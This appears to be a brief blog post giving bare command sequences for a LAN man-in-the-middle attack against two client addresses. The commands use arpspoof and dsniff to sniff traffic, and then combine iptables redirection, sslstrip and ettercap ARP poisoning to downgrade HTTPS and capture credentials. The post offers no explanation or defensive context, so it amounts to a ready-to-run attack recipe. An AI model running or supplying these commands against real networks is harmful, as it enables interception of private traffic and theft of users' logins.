Sniff without SSL strip
client 1 client 2
192.168.1.10 192.168.1.20
ATTACKER
arpspoof -t 192.168.1.10 192.168.1.20
arpspoof -t 192.168.1.20 192.168.1.10
echo 1 > /proc/sys/net/ipv4/ip_forward
dsniff
Sniff with SSL strip using ettercap
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
echo 1 > /proc/sys/net/ipv4/ip_forward
sslstrip -a -f -k
ettercap -i<interface> - TqM arp:remote // //
p
remote_browser
No comments:
Post a Comment